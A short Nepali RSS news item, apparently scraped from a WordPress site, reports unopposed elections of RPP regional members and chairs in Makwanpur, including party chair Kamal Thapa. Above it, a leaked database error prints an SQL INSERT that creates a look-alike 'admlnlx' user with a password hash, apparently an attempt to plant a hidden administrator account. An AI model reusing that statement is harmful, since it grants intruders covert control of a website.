WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bukrd.vpSKX9wbUESw3o4KAUNyd0AB.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 13:34:58', '', 'admlnlx', 'admlnlx')
हेटौँडा, माघ २२ –
राप्रपाका अध्यक्ष कमल थापा मकवानपुर क्षेत्र नं ३ बाट पार्टी क्षेत्रीय सदस्यमा निर्विरोध निर्वाचित हुनुभएको छ ।
त्यसैगरी क्षेत्रीय सदस्यमा क्षेत्र नं १ बाट सांसद गणेश थापा, केन्द्रीय सदस्य नवराज विष्ट र प्रलिता थापा निर्विरोध निर्वाचित हुनु भएको छ ।
क्षेत्र नं २ बाट पनि केन्द्रीय सदस्य राजाराम बर्तौला, क्षेत्र नं ३ बाट केन्द्रीय सदस्य दीपक सिंह र मधु अधिकारी क्षेत्रीय सदस्यमा निर्विरोध निर्वाचित हुनुभएको छ ।
त्यसैगरी क्षेत्रीय अध्यक्षमा क्षेत्र नं १ बाट राजाराम अर्याल, क्षेत्र नं २ बाट प्रमोदलाल श्रेष्ठ, क्षेत्र नं ३ बाट धु्रव सन्जेल र क्षेत्र नं ४ बाट गोविन्द रिजाल निर्विरोध निर्वाचित हुनुभएको राप्रपा मकवानपुरका अध्यक्ष रामहरि न्यौपानेले राससलाई जानकारी दिनुभयो । – रासस